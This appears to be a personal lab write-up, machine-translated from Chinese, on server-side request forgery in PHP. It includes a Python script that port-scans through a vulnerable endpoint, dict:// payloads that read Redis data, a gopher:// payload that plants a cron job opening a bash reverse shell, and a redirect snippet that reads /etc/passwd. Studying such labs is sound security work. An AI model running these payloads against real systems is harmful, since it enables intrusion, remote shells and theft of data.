SSRF-lab

SSRF( Server request forgery )

principle ：
quite a lot web Applications provide the function of obtaining data from other servers . Use user specified URL,web The app can get pictures , Download the file , Read file contents, etc . If this function is used maliciously , You can take advantage of defective web The application acts as a proxy to attack both remote and local servers .

Pictured ：
Under normal circumstances , A client sends the specified url Ask the server for something , When the server receives this request, it first Look at this. url Is it legal , Then go to the intranet resources to request this url Resources needed , Then the server returns the resource to the client .

And if a malicious user passes in url Not filtered Then he can pass ssrf Access to some resources in the intranet that are not allowed to be accessed （ That is to say client Direct access to intranet resources is not allowed , And the server can , This is it. ssrf）

stay php Will lead to ssrf Function of ：
file_get_contents()
fsockopen()
curl_exec()

experiment 1:(basic)

You can see that there is curl library :
curl_init — Initialize a cURL conversation
curl_setopt ( resource $ch , int $option , mixed $value ) : bool
{
ch: from curl_init() Back to cURL Handle .
option: Required CURLOPT_XXX Options .
value: Set to option The value on the option .

The second parameter in the code is CURLOPT_URL: Is to get the following parameters url
The third parameter is the value of the second parameter , Here is post Of handler
}
curl_exec ( resource $ch ) : mixed— Perform a given cURL conversation .（ That's the point , There is no filtering for the parameters we pass in , Then we can execute some malicious code ）
curl Supported protocols ：

file:// Can read files
Dict:// Be able to quote and allow to pass DICT List of definitions or words used by the protocol
SFTP:// ssh File transfer protocol
TFTP:// Simple file transfer protocol
LDAP:// Lightweight directory access protocol
Gopher:// Gopher Is a distributed document delivery service . Use the service , Users can browse seamlessly 、 Search and retrieve information that resides in different locations .

Use file:// Read the file

Use dict:// Port scan ：

import requests

url = "http://123.912.114.237:80/testhook.php"
porxy = [ i for i in range(1,6380)]
for i in porxy:
    ip = "127.0.0.1:{0}".format(i)
    try:
        s = requests.post(url,data={"handler":ip},timeout=1)
        if len(s.text)>0:
            print(str(i)+" Port open ")
    except  requests.exceptions.ConnectTimeout:
        print(str(i)+" Port open ")

Use dict Agreement view redis Service configuration information ：

dict://127.0.0.1:6379/info

dict://127.0.0.1:6379/KEYS *  Can get redis The content of 

Can also bounce shell, I didn't learn it redis, Put it here first , Look at it later. ：

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

experiment 2(advance1)

Looking at the source code, you can see , Here we use regular expressions to judge the protocol type , Determine whether the parameters we submit are http perhaps https At the beginning

I think others can use 302 Jump around first http and https, Is to load a from the outside php

<?php
header("Location:file:///etc/passwd");
?>

You can bypass , I opened the curl Jump function of , But I don't know why it didn't succeed , Bury a pit , Later research

Here you are ssrf Detailed bypass methods for ： Add link description

This lab Abandoned